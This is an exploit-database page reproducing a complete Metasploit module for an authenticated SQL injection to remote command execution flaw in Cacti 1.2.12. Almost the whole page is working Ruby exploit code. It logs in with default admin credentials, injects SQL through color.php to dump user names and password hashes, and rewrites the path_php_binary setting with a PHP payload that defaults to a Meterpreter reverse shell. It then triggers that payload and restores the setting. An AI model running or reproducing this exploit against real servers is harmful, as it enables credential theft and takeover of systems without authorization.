Cacti 1.2.12 SQL Injection / Remote Command Execution

2021.06.02
Credit: h00die
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-78

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasploit/framework/hashes/identify' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Cacti color filter authenticated SQLi to RCE', 'Description' => %q{ This module exploits a SQL injection vulnerability in Cacti 1.2.12 and before. An admin can exploit the filter variable within color.php to pull arbitrary values as well as conduct stacked queries. With stacked queries, the path_php_binary value is changed within the settings table to a payload, and an update is called to execute the payload. After calling the payload, the value is reset. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Leonardo Paiva', # edb, RCE 'Mayfly277' # original github, M4yFly on twitter SQLi ], 'References' => [ [ 'EDB', '49810' ], [ 'URL', 'https://github.com/Cacti/cacti/issues/3622' ], [ 'CVE', '2020-14295' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp' }, 'Payload' => { 'BadChars' => "\x22\x27" # " ' }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Side Effects' => [ CONFIG_CHANGES, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] }, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2020-06-17', 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), OptString.new('TARGETURI', [ true, 'The URI of Cacti', '/cacti/']), OptBool.new('CREDS', [ false, 'Dump cacti creds', true]) ] ) end def check begin res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET' ) return CheckCode::Safe("#{peer} - Could not connect to web service - no response") if res.nil? return CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 # cacti gives us the version in a JS variable /var cactiVersion='(?<version>\d{1,2}\.\d{1,2}\.\d{1,2})'/ =~ res.body if version && Rex::Version.new(version) <= Rex::Version.new('1.2.12') vprint_good("Version Detected: #{version}") return CheckCode::Appears end rescue ::Rex::ConnectionError CheckCode::Safe("#{peer} - Could not connect to the web service") # unknown maybe? end CheckCode::Safe("Cacti #{version} is not a vulnerable version.") end def exploit login # optionally grab the un/pass fields for all users. While we're already admin, cred stuffing... if datastore['CREDS'] # https://user-images.githubusercontent.com/23179648/84865521-a213eb80-b078-11ea-985f-f994d3409c72.png print_status('Dumping creds') res = inject("')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;") return unless res return if res.nil? return if res.body.nil? res.body.split.each do |cred| /"(?<username>[^"]+)","(?<hash>[^"]+)"/ =~ cred next unless hash next if hash == 'hex' # header row print_good("Username: #{username}, Password Hash: #{hash}") report_cred( username: username, password: hash, private_type: :nonreplayable_hash ) end end print_status('Backing-up path_php_binary value') res = inject("')+UNION+SELECT+1,value,3,4,5,6,7+from+settings+where+name='path_php_binary';") # return value: # "name","hex" # "","FEFCFF" # "/usr/bin/php","3" if res && !res.body.nil? php_binary = res.body.split.last # check to make sure we have something first before proceeding fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") if php_binary.nil? php_binary = php_binary.split(',')[0].gsub('"', '') # take last entry on page, and split to value end fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") unless php_binary print_good("path_php_binary: #{php_binary}") print_status('Uploading payload') begin pload = "#{php_binary} -r '#{payload.encoded}' #" pload = Rex::Text.uri_encode(pload.gsub("'", "\\\\'")) inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{pload}'+where+name='path_php_binary';") print_good('Executing Payload') trigger ensure resetsqli(php_binary) end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end def login cookie_jar.clear print_status('Grabbing CSRF') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => true ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 /name='__csrf_magic' value="(?<csrf>[^"]+)"/ =~ res.body fail_with(Failure::NotFound, 'Unable to find CSRF token') unless csrf print_good("CSRF: #{csrf}") print_status('Attempting login') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'keep_cookies' => true, 'vars_post' => { 'login_username' => datastore['USERNAME'], 'login_password' => datastore['PASSWORD'], 'action' => 'login', '__csrf_magic' => csrf } ) if res && res.code != 302 fail_with(Failure::NoAccess, "#{peer} - Invalid credentials (response code: #{res.code})") end res end def inject(content) res = send_request_cgi( 'uri' => "#{normalize_uri(target_uri.path, 'color.php')}?action=export&header=false&filter=1#{content}--+-", 'keep_cookies' => true ) if res && res.code != 200 fail_with(Failure::UnexpectedReply, "#{peer} - Injection Failed (response code: #{res.code})") end res end def trigger send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'host.php'), 'keep_cookies' => true, 'vars_get' => { 'action' => 'reindex' } ) end def resetsqli(php_binary) print_status('Cleaning up environment') login # any subsequent requests with our cookie will fail, so we'll need to login a 2nd time to reset the database value correctly print_status('Resetting DB Value') inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{php_binary}'+where+name='path_php_binary';") end def report_cred(opts) service_data = { address: datastore['RHOST'], port: datastore['RPORT'], service_name: 'http', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:username], private_data: opts[:password], private_type: opts[:private_type], jtr_format: identify_hash(opts[:password]) }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: '' }.merge(service_data) create_credential_login(login_data) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top